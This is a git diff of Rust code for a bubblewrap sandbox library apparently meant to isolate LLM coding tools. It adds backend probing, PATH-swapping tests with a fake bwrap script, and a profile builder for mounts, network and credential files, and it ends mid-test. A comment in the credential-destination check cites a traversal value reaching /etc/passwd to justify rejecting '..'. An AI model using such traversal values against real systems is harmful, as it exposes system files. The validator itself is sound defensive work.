+        .stderr(Stdio::piped())
+        .output();
+
+    match probe {
+        Ok(output) if output.status.success() => LinuxBwrapBackend::Available {
+            bwrap: Arc::from(bwrap),
+        },
+        Ok(output) => LinuxBwrapBackend::Unusable {
+            reason: probe_failure_reason(&output, "bubblewrap probe failed"),
+        },
+        Err(error) => LinuxBwrapBackend::Unusable {
+            reason: format!("failed to execute bubblewrap probe: {error}").into_boxed_str(),
+        },
+    }
+}
+
+/// Extracts a human-readable failure reason from a failed process output.
+///
+/// Prefers the process stderr; falls back to `fallback` plus the exit status
+/// when stderr is empty.
+fn probe_failure_reason(output: &Output, fallback: &str) -> Box<str> {
+    // Lossy decoding keeps non-UTF-8 diagnostics readable instead of failing.
+    let stderr = String::from_utf8_lossy(&output.stderr);
+    let trimmed = stderr.trim();
+    if trimmed.is_empty() {
+        format!("{fallback} (exit status: {})", output.status).into_boxed_str()
+    } else {
+        trimmed.to_owned().into_boxed_str()
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use crate::test_helpers::{replace_path, write_script};
+    use crate::Preset;
+    use serial_test::serial;
+    use tempfile::TempDir;
+
+    // These tests swap PATH and exercise a process-wide availability cache, so
+    // cases that probe `bwrap` or read PATH run serially to avoid cross-test
+    // contamination.
+
+    // Reports a missing-binary error when `PATH` has no `bwrap`.
+    #[test]
+    #[serial]
+    fn probe_backend_classifies_missing_binary() {
+        let temp = TempDir::new().unwrap();
+
+        // Point PATH at an empty directory.
+        let _guard = replace_path(temp.path());
+
+        // Run the lookup and capture the error text.
+        let result = resolve_backend_or_error_for(Some(Preset::PublicBot), &Availability::Unknown);
+
+        assert!(result.is_err());
+        let err_text = format!("{:?}", result.unwrap_err());
+
+        // Check that the error explains the missing binary.
+        assert!(
+            err_text.contains("bwrap"),
+            "error should mention bwrap: {}",
+            err_text
+        );
+        assert!(
+            err_text.contains("not found") || err_text.contains("binary"),
+            "error should indicate missing binary: {}",
+            err_text
+        );
+    }
+
+    // Reports an unusable-environment error when `bwrap` exists but cannot sandbox.
+    #[test]
+    #[serial]
+    fn probe_backend_classifies_unusable_environment() {
+        let temp = TempDir::new().unwrap();
+
+        let error_msg = "bwrap: Cannot create new namespace";
+        // Make `bwrap` look installed, then fail the "can it sandbox?" probe.
+        let script = format!(
+            r#"#!/bin/sh
+# Handle --version probe
+for arg in "$@"; do
+    if [ "$arg" = "--version" ]; then
+        echo "bubblewrap 0.8.0"
+        exit 0
+    fi
+done
+# Fail the "can it sandbox?" probe
+echo "{}" >&2
+exit 1
+"#,
+            error_msg
+        );
+        write_script(temp.path(), "bwrap", &script);
+
+        // Run the probe against the fake binary.
+        let _guard = replace_path(temp.path());
+
+        let result = resolve_backend_or_error_for(Some(Preset::PublicBot), &Availability::Unknown);
+
+        assert!(result.is_err());
+        let err_text = format!("{:?}", result.unwrap_err());
+
+        // Check that the namespace failure reaches callers.
+        assert!(
+            err_text.contains("bwrap"),
+            "error should mention bwrap: {}",
+            err_text
+        );
+        assert!(
+            err_text.contains("Cannot create new namespace"),
+            "error should preserve namespace error: {}",
+            err_text
+        );
+        assert!(
+            !err_text.contains("fallback"),
+            "error should not mention fallback: {}",
+            err_text
+        );
+    }
+
+    // Finds `bash` when it is present on the host PATH.
+    // Serial because it reads PATH while other tests replace it.
+    #[test]
+    #[serial]
+    fn find_binary_on_path_finds_bash() {
+        // Look up `bash` on the current PATH.
+        let result = find_binary_on_path("bash");
+
+        // Keep this tolerant because some minimal environments expose only `sh`.
+        if let Some(path) = result {
+            assert!(path.ends_with("bash"));
+        }
+    }
+
+    // Returns `None` for a binary name that does not exist.
+    // Serial because it reads PATH while other tests replace it.
+    #[test]
+    #[serial]
+    fn find_binary_on_path_returns_none_for_nonexistent() {
+        // Query a name that should never resolve.
+        let result = find_binary_on_path("definitely_not_a_real_binary_12345");
+        assert!(result.is_none());
+    }
+
+    // Reuses a known unavailable reason instead of probing again.
+    #[test]
+    fn unavailable_config_returns_early_error() {
+        // Start from an availability result that already failed.
+        let result = resolve_backend_or_error_for(
+            Some(Preset::PublicBot),
+            &Availability::unavailable("test reason"),
+        );
+
+        assert!(result.is_err());
+        let err_text = format!("{:?}", result.unwrap_err());
+
+        // Check that the original reason is preserved.
+        assert!(err_text.contains("test reason"));
+        assert!(err_text.contains("unavailable"));
+    }
+
+    // Uses the `Custom` profile name when no preset is selected.
+    #[test]
+    #[serial]
+    fn custom_builder_profile_returns_execution_error_not_panic() {
+        let temp = TempDir::new().unwrap();
+
+        // Remove `bwrap` from PATH and probe the custom profile.
+        let _guard = replace_path(temp.path());
+        let result = resolve_backend_or_error_for(None, &Availability::Unknown);
+
+        assert!(result.is_err());
+        let err_text = format!("{:?}", result.unwrap_err());
+
+        // Check that the error stays user-facing.
+        assert!(
+            err_text.contains("Custom"),
+            "error should mention Custom profile: {}",
+            err_text
+        );
+        assert!(
+            err_text.contains("bwrap"),
+            "error should mention bwrap: {}",
+            err_text
+        );
+    }
+}
diff --git a/src/llm-coding-tools-bubblewrap/src/profile/builder.rs b/src/llm-coding-tools-bubblewrap/src/profile/builder.rs
new file mode 100644
index 00000000..2ce37d59
--- /dev/null
+++ b/src/llm-coding-tools-bubblewrap/src/profile/builder.rs
@@ -0,0 +1,759 @@
+//! Builder for [`crate::profile::Profile`].
+//!
+//! Start with [`crate::profile::Builder::new`] for a blank builder, or use
+//! [`crate::profile::Builder::public_bot`] or
+//! [`crate::profile::Builder::trusted_maintenance`] for preset defaults.
+//! Call [`crate::profile::Builder::build`] when you are done.
+
+use super::layout::{join_mapped_path, PathMapping, SandboxLayout};
+use super::types::{
+    Availability, EnvVar, FileMount, FileOverlay, NetworkPolicy, Preset, Profile, Symlink,
+    TmpBacking,
+};
+use super::validation::{
+    ensure_cache_root_subdirs, validate_absolute_path, validate_directory_path, validate_env_vars,
+    validate_file_overlays, validate_mount_paths, validate_symlinks, validate_tmp_backing,
+    validate_tmpfs_overlays,
+};
+use crate::probe::{first_shell_candidate_with, resolve_backend_or_error_for};
+use crate::LinuxBwrapError;
+use std::ffi::OsString;
+use std::fs;
+use std::path::Path;
+use std::sync::Arc;
+
+/// Builds a validated [`crate::profile::Profile`].
+///
+/// Start with [`Self::new`] for a blank builder, or use one of the preset
+/// helpers. Then call [`Self::build`].
+///
+/// # Examples
+///
+/// Baseline builder:
+/// ```no_run
+/// use llm_coding_tools_bubblewrap::profile::{Builder, TmpBacking};
+/// use std::path::Path;
+///
+/// fn main() -> Result<(), llm_coding_tools_bubblewrap::LinuxBwrapError> {
+///     let profile = Builder::new(
+///         Path::new("/host/workspace"), // workspace: host directory mounted into the sandbox
+///         Path::new("/tmp/home"),       // synthetic_home: host dir mounted as $HOME inside the sandbox
+///         Path::new("/tmp/cache"),      // cache_root: host cache root used for sandbox cache/state dirs
+///         TmpBacking::Tmpfs,            // tmp_backing: how sandbox /tmp is backed (RAM or host dir)
+///     )
+///     .build()?;
+///
+///     assert_eq!(profile.workspace(), Path::new("/host/workspace"));
+///     Ok(())
+/// }
+/// ```
+///
+/// Public bot preset:
+/// ```no_run
+/// use llm_coding_tools_bubblewrap::profile::{Builder, TmpBacking};
+/// use std::path::Path;
+///
+/// fn main() -> Result<(), llm_coding_tools_bubblewrap::LinuxBwrapError> {
+///     let profile = Builder::public_bot(
+///         Path::new("/host/workspace"), // workspace: host directory mounted into the sandbox
+///         Path::new("/tmp/home"),       // synthetic_home: host dir mounted as $HOME (/home/sandbox) inside the sandbox
+///         Path::new("/tmp/cache"),      // cache_root: host cache root used for sandbox cache/state dirs
+///         Some(TmpBacking::Tmpfs),      // tmp_backing: how sandbox /tmp is backed (RAM or host dir)
+///     )
+///     .build()?;
+///
+///     assert_eq!(profile.synthetic_home_dest(), Path::new("/home/sandbox"));
+///     Ok(())
+/// }
+/// ```
+///
+/// # Notes
+/// - `workspace`, `synthetic_home`, and `cache_root` are host paths.
+/// - `tmp_backing` chooses memory-backed or host-backed `/tmp`.
+/// - `build` validates profile-owned paths, resolves the `bwrap` executable,
+///   resolves a visible host shell, and precomputes the static `bwrap` argv.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub struct Builder {
+    /// Preset that produced this builder, if any.
+    pub(crate) preset: Option<Preset>,
+    /// Host path to the workspace directory.
+    pub(crate) workspace: Box<Path>,
+    /// Where the workspace appears inside the sandbox (defaults to [`workspace`](Self::workspace)).
+    pub(crate) workspace_dest: Box<Path>,
+    /// Host path to the synthetic home directory.
+    pub(crate) synthetic_home: Box<Path>,
+    /// Where the synthetic home appears inside the sandbox (defaults to [`synthetic_home`](Self::synthetic_home)).
+    pub(crate) synthetic_home_dest: Box<Path>,
+    /// Host path to the cache root directory.
+    pub(crate) cache_root: Box<Path>,
+    /// Backing strategy for sandbox `/tmp` (`tmpfs` or host bind).
+    pub(crate) tmp_backing: TmpBacking,
+    /// Whether the cache root is bind-mounted inside the sandbox.
+    pub(crate) mount_cache_root: bool,
+    /// Compatibility symlinks created inside the sandbox (e.g. `/usr/bin/env`).
+    pub(crate) compat_symlinks: Arc<[Symlink]>,
+    /// Host paths mounted read-only inside the sandbox.
+    pub(crate) read_only_mounts: Arc<[Box<Path>]>,
+    /// Host paths mounted read-write inside the sandbox.
+    pub(crate) read_write_mounts: Arc<[Box<Path>]>,
+    /// Sandbox paths backed by `tmpfs` (writable, discarded on exit).
+    pub(crate) tmpfs_overlays: Arc<[Box<Path>]>,
+    /// Sandbox files replaced by a read-only bind-mount of a host file.
+    pub(crate) file_overlays: Arc<[FileOverlay]>,
+    /// Individual files mounted read-only for credential injection.
+    pub(crate) credential_file_mounts: Arc<[FileMount]>,
+    /// When `true`, the entire host rootfs is mounted read-only instead of individual read-only mounts.
+    pub(crate) read_only_host_rootfs: bool,
+    /// Controls whether the sandbox has network access.
+    pub(crate) network_policy: NetworkPolicy,
+    /// When `true`, inherited env vars are cleared before applying [`default_env`](Self::default_env) and [`extra_env`](Self::extra_env).
+    pub(crate) clear_env: bool,
+    /// Env vars always set (applied before [`extra_env`](Self::extra_env)).
+    pub(crate) default_env: Arc<[EnvVar]>,
+    /// Additional env vars set on top of [`default_env`](Self::default_env).
+    pub(crate) extra_env: Arc<[EnvVar]>,
+    /// Tracks whether `bwrap` is usable (checked during [`build`](Self::build)).
+    pub(crate) availability: Availability,
+}
+
+impl Builder {
+    /// Creates a new builder with baseline defaults and no preset.
+    ///
+    /// # Arguments
+    /// - `workspace` - Host path to the workspace directory.
+    /// - `synthetic_home` - Host path to the synthetic home directory.
+    /// - `cache_root` - Host path to the cache root directory.
+    /// - `tmp_backing` - How sandbox `/tmp` is mounted.
+    ///
+    /// # Defaults
+    /// - `workspace_dest` and `synthetic_home_dest` are set to match the host paths.
+    /// - `mount_cache_root` is `true`.
+    /// - Mount and env lists start empty.
+    /// - `network_policy` is `Disabled`.
+    /// - `clear_env` is `false`.
+    /// - `availability` is `Unknown`.
+    pub fn new(
+        workspace: impl Into<Box<Path>>,
+        synthetic_home: impl Into<Box<Path>>,
+        cache_root: impl Into<Box<Path>>,
+        tmp_backing: TmpBacking,
+    ) -> Self {
+        let workspace = workspace.into();
+        let synthetic_home = synthetic_home.into();
+
+        Self {
+            preset: None,
+            // Destinations default to the host paths (identity mapping).
+            workspace_dest: workspace.clone(),
+            workspace,
+            synthetic_home_dest: synthetic_home.clone(),
+            synthetic_home,
+            cache_root: cache_root.into(),
+            tmp_backing,
+            mount_cache_root: true,
+            compat_symlinks: Arc::new([]),
+            read_only_mounts: Arc::new([]),
+            read_write_mounts: Arc::new([]),
+            tmpfs_overlays: Arc::new([]),
+            file_overlays: Arc::new([]),
+            credential_file_mounts: Arc::new([]),
+            read_only_host_rootfs: false,
+            network_policy: NetworkPolicy::Disabled,
+            clear_env: false,
+            default_env: Arc::new([]),
+            extra_env: Arc::new([]),
+            availability: Availability::Unknown,
+        }
+    }
+
+    /// Sets the preset that produced this builder.
+    ///
+    /// This is an internal helper used by preset constructors.
+    pub(crate) fn with_preset(mut self, preset: Preset) -> Self {
+        self.preset = Some(preset);
+        self
+    }
+
+    /// Consumes the builder and produces a ready-to-run [`Profile`].
+    ///
+    /// Ensures cache-root subdirectories exist, validates all builder fields,
+    /// resolves the `bwrap` executable on the host, locates a shell visible
+    /// inside the sandbox, and precomputes the static `bwrap` argument vector.
+    ///
+    /// # Returns
+    ///
+    /// A [`Profile`] carrying the resolved `bwrap` path, shell path, and
+    /// prebuilt argument list — everything needed to launch the sandbox.
+    ///
+    /// # Errors
+    ///
+    /// Returns [`LinuxBwrapError`] when any of the following checks fail:
+    ///
+    /// - Cache-root subdirectory creation (depends on preset).
+    /// - Path validation: host paths must exist and be absolute directories;
+    ///   destination paths must be absolute; credential file sources must be
+    ///   existing regular files, and credential file destinations must stay
+    ///   within the synthetic home, workspace, or (when mounted) cache root.
+    /// - Environment variable names must not contain `=`.
+    /// - Symlink targets and link paths must be absolute.
+    /// - Tmpfs overlay paths must be absolute.
+    /// - The `bwrap` backend must be available on the host.
+    /// - At least one host shell (`bash` or `sh`) must be visible inside the
+    ///   sandbox given the current mount configuration.
+    pub fn build(self) -> Result<Profile, LinuxBwrapError> {
+        ensure_cache_root_subdirs(self.mount_cache_root, self.cache_root.as_ref())?;
+        validate_builder(&self)?;
+        let bwrap_program = resolve_backend_or_error_for(self.preset, &self.availability)?;
+        let shell = resolve_shell_for_builder(&self)?;
+        let static_args = build_static_args(&self);
+
+        Ok(Profile {
+            preset: self.preset,
+            workspace: self.workspace,
+            workspace_dest: self.workspace_dest,
+            synthetic_home: self.synthetic_home,
+            synthetic_home_dest: self.synthetic_home_dest,
+            cache_root: self.cache_root,
+            tmp_backing: self.tmp_backing,
+            mount_cache_root: self.mount_cache_root,
+            compat_symlinks: self.compat_symlinks,
+            read_only_mounts: self.read_only_mounts,
+            read_write_mounts: self.read_write_mounts,
+            tmpfs_overlays: self.tmpfs_overlays,
+            file_overlays: self.file_overlays,
+            credential_file_mounts: self.credential_file_mounts,
+            read_only_host_rootfs: self.read_only_host_rootfs,
+            network_policy: self.network_policy,
+            clear_env: self.clear_env,
+            default_env: self.default_env,
+            extra_env: self.extra_env,
+            // Reaching this point means the backend was resolved successfully.
+            availability: Availability::Available,
+            bwrap_program,
+            shell,
+            static_args,
+        })
+    }
+
+    /// Sets where the workspace appears inside the sandbox.
+    pub fn with_workspace_dest(mut self, dest: impl Into<Box<Path>>) -> Self {
+        self.workspace_dest = dest.into();
+        self
+    }
+
+    /// Sets where the synthetic home appears inside the sandbox.
+    pub fn with_synthetic_home_dest(mut self, dest: impl Into<Box<Path>>) -> Self {
+        self.synthetic_home_dest = dest.into();
+        self
+    }
+
+    /// Sets whether to mount the cache root.
+    pub fn with_mount_cache_root(mut self, mount_cache_root: bool) -> Self {
+        self.mount_cache_root = mount_cache_root;
+        self
+    }
+
+    /// Sets the backing strategy for sandbox `/tmp`.
+    pub fn with_tmp_backing(mut self, tmp_backing: TmpBacking) -> Self {
+        self.tmp_backing = tmp_backing;
+        self
+    }
+
+    /// Replaces the compatibility symlink list.
+    pub fn with_compat_symlinks(mut self, compat_symlinks: impl Into<Arc<[Symlink]>>) -> Self {
+        self.compat_symlinks = compat_symlinks.into();
+        self
+    }
+
+    /// Replaces the read-only mount list.
+    pub fn with_read_only_mounts(mut self, mounts: impl Into<Arc<[Box<Path>]>>) -> Self {
+        self.read_only_mounts = mounts.into();
+        self
+    }
+
+    /// Replaces the read-write mount list.
+    pub fn with_read_write_mounts(mut self, mounts: impl Into<Arc<[Box<Path>]>>) -> Self {
+        self.read_write_mounts = mounts.into();
+        self
+    }
+
+    /// Replaces the tmpfs overlay list.
+    pub fn with_tmpfs_overlays(mut self, mounts: impl Into<Arc<[Box<Path>]>>) -> Self {
+        self.tmpfs_overlays = mounts.into();
+        self
+    }
+
+    /// Replaces the file overlay list.
+    ///
+    /// Each overlay replaces a sandbox file with a read-only bind-mount of
+    /// the specified host source file.
+    pub fn with_file_overlays(mut self, overlays: impl Into<Arc<[FileOverlay]>>) -> Self {
+        self.file_overlays = overlays.into();
+        self
+    }
+
+    /// Replaces the credential file mount list.
+    pub fn with_credential_file_mounts(mut self, mounts: impl Into<Arc<[FileMount]>>) -> Self {
+        self.credential_file_mounts = mounts.into();
+        self
+    }
+
+    /// Sets whether to mount the host root read-only.
+    pub fn with_read_only_host_rootfs(mut self, enabled: bool) -> Self {
+        self.read_only_host_rootfs = enabled;
+        self
+    }
+
+    /// Sets the network policy.
+    pub fn with_network_policy(mut self, policy: NetworkPolicy) -> Self {
+        self.network_policy = policy;
+        self
+    }
+
+    /// Sets whether to clear inherited env vars.
+    pub fn with_clear_env(mut self, clear: bool) -> Self {
+        self.clear_env = clear;
+        self
+    }
+
+    /// Replaces the default env var list.
+    pub fn with_default_env(mut self, env: impl Into<Arc<[EnvVar]>>) -> Self {
+        self.default_env = env.into();
+        self
+    }
+
+    /// Replaces the extra env var list.
+    pub fn with_extra_env(mut self, env: impl Into<Arc<[EnvVar]>>) -> Self {
+        self.extra_env = env.into();
+        self
+    }
+
+    /// Sets the stored availability state.
+    pub fn with_availability(mut self, availability: Availability) -> Self {
+        self.availability = availability;
+        self
+    }
+}
+
+/// Runs every field-level validation for `builder`, stopping at the first error.
+fn validate_builder(builder: &Builder) -> Result<(), LinuxBwrapError> {
+    validate_directory_path(builder.workspace.as_ref(), "workspace host directory")?;
+    validate_directory_path(
+        builder.synthetic_home.as_ref(),
+        "synthetic home host directory",
+    )?;
+    validate_absolute_path(builder.cache_root.as_ref(), "cache root host path")?;
+    // The cache root only has to be a directory when it is actually mounted.
+    if builder.mount_cache_root {
+        validate_directory_path(builder.cache_root.as_ref(), "cache root host directory")?;
+    }
+
+    validate_absolute_path(builder.workspace_dest.as_ref(), "workspace destination")?;
+    validate_absolute_path(
+        builder.synthetic_home_dest.as_ref(),
+        "synthetic home destination",
+    )?;
+    validate_tmp_backing(&builder.tmp_backing)?;
+    validate_mount_paths(&builder.read_only_mounts, "read-only mount source")?;
+    validate_mount_paths(&builder.read_write_mounts, "read-write mount source")?;
+    validate_tmpfs_overlays(&builder.tmpfs_overlays)?;
+    validate_file_overlays(&builder.file_overlays)?;
+    validate_symlinks(&builder.compat_symlinks)?;
+    validate_env_vars(builder.default_env.as_ref(), "default")?;
+    validate_env_vars(builder.extra_env.as_ref(), "extra")?;
+    validate_credential_file_mounts(builder)?;
+    Ok(())
+}
+
+/// Checks each credential file mount.
+///
+/// Source and destination must be absolute, the source must be an existing
+/// regular file, and the destination must pass [`credential_dest_is_allowed`].
+fn validate_credential_file_mounts(builder: &Builder) -> Result<(), LinuxBwrapError> {
+    for mount in builder.credential_file_mounts.iter() {
+        validate_absolute_path(mount.source(), "credential file source")?;
+        validate_absolute_path(mount.dest(), "credential file destination")?;
+
+        let metadata = fs::metadata(mount.source()).map_err(|error| {
+            LinuxBwrapError::InvalidPath(format!(
+                "credential file source must exist and be readable: {} ({error})",
+                mount.source().display()
+            ))
+        })?;
+        if !metadata.is_file() {
+            return Err(LinuxBwrapError::InvalidPath(format!(
+                "credential file source must be a regular file: {}",
+                mount.source().display()
+            )));
+        }
+        if !credential_dest_is_allowed(builder, mount.dest()) {
+            return Err(LinuxBwrapError::InvalidPath(format!(
+                "credential file destination must stay within the synthetic home, workspace, or cache root: {}",
+                mount.dest().display()
+            )));
+        }
+    }
+
+    Ok(())
+}
+
+/// Returns `true` when `dest` lies under the synthetic home destination, the
+/// workspace destination, or (when mounted) the cache root.
+///
+/// Destinations containing a `..` component are rejected outright.
+fn credential_dest_is_allowed(builder: &Builder, dest: &Path) -> bool {
+    // `Path::starts_with` compares components lexically, so a destination such
+    // as `<home>/../etc/passwd` would pass the prefix test even though it
+    // resolves outside `<home>`.
+    if dest
+        .components()
+        .any(|component| matches!(component, std::path::Component::ParentDir))
+    {
+        return false;
+    }
+
+    dest.starts_with(builder.synthetic_home_dest.as_ref())
+        || dest.starts_with(builder.workspace_dest.as_ref())
+        || (builder.mount_cache_root && dest.starts_with(builder.cache_root.as_ref()))
+}
+
+/// Picks the first host shell that is visible under the builder's mount
+/// layout and returns its path as seen from inside the sandbox.
+fn resolve_shell_for_builder(builder: &Builder) -> Result<Box<Path>, LinuxBwrapError> {
+    let layout = builder_sandbox_layout(builder);
+    if let Some((_host_shell, sandbox_path)) = first_shell_candidate_with(|shell| {
+        layout.classify(shell).map(|mapping| match mapping {
+            PathMapping::SamePath => shell.to_path_buf(),
+            PathMapping::Remap {
+                dest_prefix,
+                relative,
+            } => join_mapped_path(dest_prefix, relative).into_owned(),
+        })
+    }) {
+        return Ok(sandbox_path.into_boxed_path());
+    }
+
+    Err(LinuxBwrapError::Execution(
+        "no usable host shell is visible inside the linux sandbox; expected a system `bash` or `sh` mounted by the selected profile"
+            .to_string(),
+    ))
+}
+
+/// Borrows the builder's mount-related fields as a [`SandboxLayout`].
+fn builder_sandbox_layout(builder: &Builder) -> SandboxLayout<'_> {
+    SandboxLayout {
+        workspace: builder.workspace.as_ref(),
+        workspace_dest: builder.workspace_dest.as_ref(),
+        synthetic_home: builder.synthetic_home.as_ref(),
+        synthetic_home_dest: builder.synthetic_home_dest.as_ref(),
+        cache_root: builder.cache_root.as_ref(),
+        mount_cache_root: builder.mount_cache_root,
+        tmp_backing: &builder.tmp_backing,
+        read_only_host_rootfs: builder.read_only_host_rootfs,
+        tmpfs_overlays: builder.tmpfs_overlays.as_ref(),
+        file_overlays: builder.file_overlays.as_ref(),
+        read_only_mounts: builder.read_only_mounts.as_ref(),
+        read_write_mounts: builder.read_write_mounts.as_ref(),
+    }
+}
+
+/// Builds the `bwrap` arguments that depend only on the builder's fields.
+///
+/// The push order below is the order of the arguments on the command line.
+fn build_static_args(builder: &Builder) -> Arc<[OsString]> {
+    let mut args = Vec::with_capacity(arg_capacity_for(builder));
+
+    args.extend([
+        OsString::from("--die-with-parent"),
+        OsString::from("--new-session"),
+    ]);
+
+    if matches!(builder.network_policy, NetworkPolicy::Disabled) {
+        args.push(OsString::from("--unshare-net"));
+    }
+    if builder.clear_env {
+        args.push(OsString::from("--clearenv"));
+    }
+    push_env_args(&mut args, builder.default_env.as_ref());
+    push_env_args(&mut args, builder.extra_env.as_ref());
+
+    if builder.read_only_host_rootfs {
+        push_bind(&mut args, "--ro-bind", Path::new("/"), Path::new("/"));
+    }
+    push_tmpfs_mounts(&mut args, builder.tmpfs_overlays.as_ref());
+    push_file_overlay_mounts(&mut args, builder.file_overlays.as_ref());
+    // Individual read-only mounts are only emitted when the whole host root
+    // is not already bound read-only.
+    if !builder.read_only_host_rootfs {
+        push_same_path_binds(&mut args, "--ro-bind", builder.read_only_mounts.as_ref());
+    }
+    push_symlinks(&mut args, builder.compat_symlinks.as_ref());
+    args.extend([
+        OsString::from("--dev"),
+        OsString::from("/dev"),
+        OsString::from("--proc"),
+        OsString::from("/proc"),
+    ]);
+    push_tmp_mount(&mut args, &builder.tmp_backing);
+    push_bind(
+        &mut args,
+        "--bind",
+        builder.synthetic_home.as_ref(),
+        builder.synthetic_home_dest.as_ref(),
+    );
+    if builder.mount_cache_root {
+        push_bind(
+            &mut args,
+            "--bind",
+            builder.cache_root.as_ref(),
+            builder.cache_root.as_ref(),
+        );
+    }
+    push_bind(
+        &mut args,
+        "--bind",
+        builder.workspace.as_ref(),
+        builder.workspace_dest.as_ref(),
+    );
+    push_same_path_binds(&mut args, "--bind", builder.read_write_mounts.as_ref());
+    push_file_mounts(&mut args, builder.credential_file_mounts.as_ref());
+
+    Arc::from(args)
+}
+
+/// Returns the exact number of arguments [`build_static_args`] pushes for
+/// `builder`, used to size the vector up front.
+fn arg_capacity_for(builder: &Builder) -> usize {
+    let env_count = builder.default_env.len() + builder.extra_env.len();
+    let ro_slots = if builder.read_only_host_rootfs {
+        3
+    } else {
+        builder.read_only_mounts.len() * 3
+    };
+    let mount_slots = ro_slots
+        + builder.read_write_mounts.len() * 3
+        + builder.credential_file_mounts.len() * 3
+        + builder.compat_symlinks.len() * 3
+        + builder.tmpfs_overlays.len() * 2
+        + builder.file_overlays.len() * 3
+        + usize::from(builder.mount_cache_root) * 3;
+    let tmp_slots = match builder.tmp_backing {
+        TmpBacking::Tmpfs => 2,
+        TmpBacking::BindHost(_) => 3,
+    };
+    // 12 = `--die-with-parent` + `--new-session` (2), `--dev /dev --proc /proc`
+    // (4), the synthetic home bind (3) and the workspace bind (3).
+    let fixed_slots = 12
+        + usize::from(builder.clear_env)
+        + usize::from(matches!(builder.network_policy, NetworkPolicy::Disabled));
+
+    fixed_slots + env_count * 3 + mount_slots + tmp_slots
+}
+
+/// Pushes `flag source dest`.
+fn push_bind(args: &mut Vec<OsString>, flag: &str, source: &Path, dest: &Path) {
+    args.push(OsString::from(flag));
+    args.push(source.as_os_str().into());
+    args.push(dest.as_os_str().into());
+}
+
+/// Pushes `--symlink target link_path` for each symlink.
+fn push_symlinks(args: &mut Vec<OsString>, symlinks: &[Symlink]) {
+    for symlink in symlinks {
+        args.push(OsString::from("--symlink"));
+        args.push(OsString::from(symlink.target()));
+        args.push(symlink.link_path().as_os_str().into());
+    }
+}
+
+/// Pushes `--setenv name value` for each variable.
+fn push_env_args(args: &mut Vec<OsString>, env_vars: &[EnvVar]) {
+    for var in env_vars {
+        args.push(OsString::from("--setenv"));
+        args.push(OsString::from(var.name()));
+        args.push(OsString::from(var.value()));
+    }
+}
+
+/// Pushes `flag path path`, binding `path` at the same location in the sandbox.
+fn push_same_path_bind(args: &mut Vec<OsString>, flag: &str, path: &Path) {
+    args.push(OsString::from(flag));
+    args.push(path.as_os_str().into());
+    args.push(path.as_os_str().into());
+}
+
+/// Applies [`push_same_path_bind`] to every path.
+fn push_same_path_binds(args: &mut Vec<OsString>, flag: &str, paths: &[Box<Path>]) {
+    for path in paths {
+        push_same_path_bind(args, flag, path);
+    }
+}
+
+/// Pushes `--tmpfs path` for each path.
+fn push_tmpfs_mounts(args: &mut Vec<OsString>, paths: &[Box<Path>]) {
+    for path in paths {
+        args.push(OsString::from("--tmpfs"));
+        args.push(path.as_os_str().into());
+    }
+}
+
+/// Pushes a read-only bind for each file overlay.
+fn push_file_overlay_mounts(args: &mut Vec<OsString>, overlays: &[FileOverlay]) {
+    for overlay in overlays {
+        push_bind(args, "--ro-bind", overlay.source(), overlay.dest());
+    }
+}
+
+/// Pushes the `/tmp` mount: a tmpfs, or a writable bind of the host directory.
+fn push_tmp_mount(args: &mut Vec<OsString>, tmp_backing: &TmpBacking) {
+    match tmp_backing {
+        TmpBacking::Tmpfs => {
+            args.push(OsString::from("--tmpfs"));
+            args.push(OsString::from("/tmp"));
+        }
+        TmpBacking::BindHost(host_dir) => push_bind(args, "--bind", host_dir, Path::new("/tmp")),
+    }
+}
+
+/// Pushes a read-only bind for each credential file mount.
+fn push_file_mounts(args: &mut Vec<OsString>, mounts: &[FileMount]) {
+    for mount in mounts {
+        push_bind(args, "--ro-bind", mount.source(), mount.dest());
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use crate::test_helpers::{SandboxDirs, SandboxFixture};
+    use serial_test::serial;
+    use tempfile::TempDir;
+
+    #[test]
+    #[serial]
+    fn empty_builder_builds_identity_destinations_and_empty_collections() {
+        let fixture = SandboxFixture::new("exit 0");
+        let workspace = fixture.temp_path().to_path_buf();
+        let home = fixture.home().to_path_buf();
+        let cache = fixture.cache().to_path_buf();
+
+        let profile = Builder::new(&*workspace, &*home, &*cache, TmpBacking::Tmpfs)
+            .build()
+            .unwrap();
+
+        assert_eq!(profile.workspace(), workspace.as_path());
+        assert_eq!(profile.workspace_dest(), workspace.as_path());
+        assert_eq!(profile.synthetic_home(), home.as_path());
+        assert_eq!(profile.synthetic_home_dest(), home.as_path());
+        assert_eq!(profile.cache_root(), cache.as_path());
+        assert_eq!(profile.tmp_backing(), &TmpBacking::Tmpfs);
+        assert!(profile.compat_symlinks().is_empty());
+        assert!(profile.read_only_mounts().is_empty());
+        assert!(profile.read_write_mounts().is_empty());
+        assert!(profile.tmpfs_overlays().is_empty());
+        assert!(profile.credential_file_mounts().is_empty());
+        assert!(profile.default_env().is_empty());
+        assert!(profile.extra_env().is_empty());
+        assert!(profile.mount_cache_root());
+        assert!(!profile.read_only_host_rootfs());
+        assert!(!profile.clear_env());
+        assert_eq!(profile.network_policy(), NetworkPolicy::Disabled);
+        assert_eq!(profile.preset(), None);
+        assert!(profile.availability().is_available());
+        assert!(profile.bwrap_program().ends_with("bwrap"));
+        assert!(profile.shell().ends_with("bash") || profile.shell().ends_with("sh"));
+        assert!(!profile.static_args().is_empty());
+    }
+
+    #[test]
+    #[serial]
+    fn preset_builder_can_still_be_customized_before_build() {
+        let fixture = SandboxFixture::new("exit 0");
+        let workspace = fixture.temp_path().to_path_buf();
+        let host_tmp = fixture.make_dir("host-tmp");
+
+        let profile = Builder::new(
+            &*workspace,
+            fixture.home(),
+            fixture.cache(),
+            TmpBacking::Tmpfs,
+        )
+        .with_preset(Preset::PublicBot)
+        .with_mount_cache_root(true)
+        .with_tmp_backing(TmpBacking::BindHost(host_tmp.clone().into_boxed_path()))
+        .with_extra_env(Arc::from([EnvVar::new("FOO", "bar")]))
+        .build()
+        .unwrap();
+
+        assert_eq!(profile.preset(), Some(Preset::PublicBot));
+        assert!(profile.mount_cache_root());
+        assert_eq!(
+            profile.tmp_backing(),
+            &TmpBacking::BindHost(host_tmp.into_boxed_path())
+        );
+        assert_eq!(profile.extra_env().len(), 1);
+        assert_eq!(profile.extra_env()[0].name(), "FOO");
+        assert_eq!(profile.extra_env()[0].value(), "bar");
+    }
+
+    #[test]
+    #[serial]
+    fn arg_capacity_for_matches_actual_push_count() {
+        let fixture = SandboxFixture::new("exit 0");
+        let workspace = fixture.temp_path().to_path_buf();
